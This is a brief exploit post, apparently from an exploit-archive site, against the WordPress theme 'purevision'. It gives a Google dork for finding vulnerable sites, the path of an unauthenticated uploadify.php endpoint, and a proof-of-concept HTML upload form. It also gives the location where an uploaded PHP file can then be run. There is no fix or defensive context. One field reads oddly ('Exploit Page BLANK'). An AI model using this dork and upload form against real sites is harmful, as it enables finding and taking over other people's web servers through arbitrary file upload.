Google Dork : inurl:/wp-content/themes/purevision/
Exploit : https://localhost/ wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php
Vulnerability : Exploit Page BLANK
PoC :
<form method="POST" action="https://localhost/wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<button>Upload!</button><br/>
</form>
File Access : https://localhost/your-files.php